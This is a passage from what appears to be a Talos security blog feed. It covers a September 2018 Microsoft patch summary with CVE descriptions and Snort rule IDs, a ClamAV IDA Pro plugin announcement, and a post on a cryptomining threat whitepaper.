CVE-2018-8464 is a remote code execution vulnerability in Microsoft Edge's PDF reader that exists in the way the reader handles objects in memory. An attacker could exploit this bug by convincing a user to click on a web page that contains a malicious PDF, or by hosting the PDF on websites that host user-provided content.

CVE-2018-8465, CVE-2018-8466 and CVE-2018-8467 are remote code execution vulnerabilities in the Chakra scripting engine that lie in the way it handles objects in memory in the Microsoft Edge web browser. An attacker can exploit these bugs by tricking the user into opening a malicious web page, or an advertisement that is hosted on a website that allows user-provided content.

The other critical vulnerability is:

• CVE-2018-8421 — .NET Framework Remote Code Execution Vulnerability

Important vulnerabilities

There is also coverage for 43 important vulnerabilities, 11 of which we wish to highlight.

CVE-2018-8354 is a remote code execution vulnerability that exists in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. A user would need to visit a specially crafted, malicious website in order to trigger this vulnerability.

CVE-2018-8392 and CVE-2018-8393 are buffer overflow vulnerabilities in the Microsoft Jet Database Engine. To exploit these bugs, a user must open a specially crafted Excel file while using an at-risk version of Windows. An attacker could exploit these vulnerabilities to execute code on the victim's machine at an administrator's level.

CVE-2018-8430 is a remote code execution vulnerability in Microsoft Word 2013 and 2016. An attacker can exploit this by tricking a user into opening a specially crafted, malicious PDF.

CVE-2018-8447 is an elevation of privilege vulnerability that lies in the way Windows processes calls to Advanced Local Procedure Call (ALPC). An attacker would need to log onto the system directly in order to exploit this vulnerability, and then run a specially crafted application.

CVE-2018-8331 is a remote code execution vulnerability in Microsoft Excel that exists when the software fails to correctly handle objects in memory. A user could trigger this bug by opening a specially crafted, malicious file in an email or on a web page.

CVE-2018-8315 is an information disclosure vulnerability in Microsoft's scripting engine that could expose uninitialized memory if exploited. An attacker could access this information by convincing a user to visit a malicious website and then leveraging the vulnerability to obtain privileged data from the browser process.

CVE-2018-8335 is a denial-of-service vulnerability in the Microsoft Server Block Message (SMB). An attacker can send a specially crafted request to the server to trigger this vulnerability.

CVE-2018-8425 is a spoofing vulnerability in the Microsoft Edge web browser. The bug lies in the way the browser handles specific HTML content. If an attacker correctly exploits this bug, a user could be tricked into thinking they are visiting a legitimate website when they are actually on a malicious page.

CVE-2018-8440 is an elevation of privilege vulnerability that occurs when Windows incorrectly handles calls to Advanced Local Procedure Call (APLC). An attacker needs to log onto the system directly to exploit this vulnerability, and then run a specially crafted application to take over the system. This vulnerability has been spotted in the wild as part of several pieces of malware.

The other vulnerabilities that are rated "important" are:

• CVE-2018-8271 — Windows Information Disclosure Vulnerability
• CVE-2018-8336 — Windows Kernel Information Disclosure Vulnerability
• CVE-2018-8337 — Windows Subsystem for Linux Security Feature Bypass Vulnerability
• CVE-2018-8366 — Microsoft Edge Information Disclosure Vulnerability
• CVE-2018-8409 — ASP.NET Core Denial of Service
• CVE-2018-8410 — Windows Registry Elevation of Privilege Vulnerability
• CVE-2018-8424 — Windows GDI Information Disclosure Vulnerability
• CVE-2018-8426 — Microsoft Office SharePoint XSS Vulnerability
• CVE-2018-8428 — Microsoft SharePoint Elevation of Privilege Vulnerability
• CVE-2018-8429 — Microsoft Excel Information Disclosure Vulnerability
• CVE-2018-8431 — Microsoft SharePoint Elevation of Privilege Vulnerability
• CVE-2018-8433 — Microsoft Graphics Component Information Disclosure Vulnerability
• CVE-2018-8434 — Windows Hyper-V Information Disclosure Vulnerability
• CVE-2018-8435 — Windows Hyper-V Security Feature Bypass Vulnerability
• CVE-2018-8436 — Windows Hyper-V Denial of Service Vulnerability
• CVE-2018-8437 — Windows Hyper-V Denial of Service Vulnerability
• CVE-2018-8438 — Windows Denial of Service Vulnerability
• CVE-2018-8441 — Windows ALPC Elevation of Privilege Vulnerability
• CVE-2018-8442 — Windows Kernel Information Disclosure Vulnerability
• CVE-2018-8443 — Windows Kernel Information Disclosure Vulnerability
• CVE-2018-8444 — Windows SMB Information Disclosure Vulnerability
• CVE-2018-8445 — Windows Kernel Information Disclosure Vulnerability
• CVE-2018-8446 — Windows Kernel Information Disclosure Vulnerability
• CVE-2018-8449 — Device Guard Security Feature Bypass Vulnerability
• CVE-2018-8452 — Scripting Engine Information Disclosure Vulnerability
• CVE-2018-8455 — Windows Kernel Elevation of Privilege Vulnerability
• CVE-2018-8462 — DirectX Graphics Kernel Elevation of Privilege Vulnerability
• CVE-2018-8463 — Microsoft Edge Elevation of Privilege Vulnerability
• CVE-2018-8468 — Windows Elevation of Privilege Vulnerability
• CVE-2018-8469 — Microsoft Edge Elevation of Privilege Vulnerability
• CVE-2018-8470 — Internet Explorer Security Feature Bypass Vulnerability

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 45142-45143, 47702-47703, 47717-47718, 47730-47741, 47745-47748

Executive summary

ClamAV Signature Creator (CASC) is an IDA Pro plugin that assists in the creation of ClamAV pattern signatures. We have enhanced this plugin to also analyze these signatures. The plugin highlights matching parts in a binary when its given a particular signature. This function is helpful when evaluating automatically generated signatures, e.g., from the BASS framework. As a larger number of signatures is automatically generated, it becomes ever more important to gain a quick understanding about the effects of these signatures. This functionality will allow us to check the accuracy of our signatures faster, and allow us to deliver a better product to our users.

You can read the the complete post and see the associated video on the Clam AV blog

This post is authored by Ashlee Benge.

Despite the recent devaluation of some cryptocurrencies, illicit cryptocurrency miners remain a lucrative and widespread attack vector in the threat landscape. These miners are easy to deploy, and attackers see it as a quick way to steal other users' processing power to generate cryptocurrency. These attacks are harder to notice than a traditional denial-of-service or malware campaign, resulting in reduced risk and a more stable foothold for a malicious actor. The Cyber Threat Alliance, with contributions from Cisco Talos and other CTA members, has released a whitepaper detailing the rise of cryptomining attacks that outlines what you — and your organization — should know about these kinds of campaigns.

This paper covers the fact that there is a low technical barrier to entry for attackers, and that there are accessible patches to protect users from many of these attacks. Because cryptomining campaigns are easy to launch, a broader set of actors have engaged in this activity, resulting in a higher rate of attacks. Talos often observes multiple actors with illicit cryptomining software on the same compromised box. The use of well-known vulnerabilities by attackers essentially turns this problem into a canary-in-the-coalmine situation for defenders. If you discover unauthorized cryptomining software on one of your assets, there is a high likelihood that other actors have also leveraged the weaknesses in your systems to gain access — potentially for more damaging purposes.

Prior Coverage

Snort signatures exist to provide coverage for a variety of miner downloads, malware variants related to cryptocurrency miners and to block protocols commonly used by miners.

The following SIDs detect incoming clients and miner downloads:

44692-44693, 45265-45268, 45809-45810, 45949-45952, 46365-46366 and 46370-46372.

The following SIDs detect malware variants known to be associated with miners:

20035, 20057, 26395, 28399, 28410-28411, 29493 - 29494, 29666, 30551- 30552, 31271- 31273, 31531 - 31533, 32013, 33149, 43467 - 43468, 44895 - 44899, 45468 - 45473, 45548, 45826 - 45827, 46238 - 46240.

The following SIDs detect Stratum protocols used by cryptocurrency workers:

26437, 40840 - 40842, 45417, 45549 - 45550, 45825, 45955.

Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.